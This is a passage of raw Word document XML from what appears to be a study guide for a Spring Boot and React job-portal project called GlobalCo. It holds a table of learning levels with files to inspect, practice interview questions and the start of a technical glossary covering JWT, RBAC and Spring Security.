              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why is a decoupled client-server architecture superior to server-rendered JSP/Thymeleaf?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 5: Frontend Layout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AppRoutes.jsx, AuthContext.jsx, api.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Inspect React Router navigation, global authentication context, and Axios request/response interceptors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>How does the Axios request interceptor attach the Bearer token?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 6: Backend Layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>controller/, service/, repository/, entity/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Inspect Spring Boot tiering: Controllers (@RestController), Services (@Service), and Repositories (@Repository).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why are database queries never executed inside controllers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 7: Relational Schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>schema.sql, JPA Entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Understand how tables link: Users (1:1) CandidateProfiles (M:N) Skills; Jobs (1:M) Applications (1:M) Interviews.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>How does the composite UNIQUE constraint prevent duplicate job applications?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 8: REST APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobController.java, ApplicationController.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Review the endpoints: /api/auth/login, /api/jobs, /api/jobs/{id}/apply, /api/recruiter/my-jobs, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What HTTP status codes are returned on successful creation vs resource not found?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 9: Security &amp; JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JwtUtil.java, JwtAuthenticationFilter.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trace how JWT tokens are generated on login (JwtUtil), sent via Authorization header, and parsed in the filter.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What algorithm signs the JWT, and where is the secret key stored?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 10: Critical Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicationService.java, CandidateProfileService.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Review the exact Java business logic for match score calculation and atomic application submission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why is @Transactional required on ApplicationService.applyForJob()?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 11: Runtime Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Console logs, doc_assets/ screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Understand how to run both servers: 'mvn spring-boot:run' on port 8080 and 'npm run dev' on port 5173.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What ports and URLs are used for Swagger UI and H2 Console?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 12: Interview Mastery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Part 4 Q&amp;A, 30-sec pitch, 2-min walkthrough</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Practice the 30-second pitch, 2-minute architectural walkthrough, and difficult edge case defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>How would you defend using a Modular Monolith over Microservices?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>36. Master Project Technical Glossary</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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Technical Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Definitive Engineering Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JWT (JSON Web Token)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A compact, URL-safe means of representing claims to be transferred between two parties. In GlobalCo, tokens are digitally signed using HMAC-SHA256.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RBAC (Role-Based Access Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A security approach restricting system access based on roles assigned to authorized users (ROLE_CANDIDATE, ROLE_RECRUITER, ROLE_ADMIN).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Boot 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>An opinionated Java framework simplifying microservice and enterprise web app development through auto-configuration and embedded Tomcat.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Security 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A powerful authentication and access-control framework utilizing component-based SecurityFilterChain beans.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
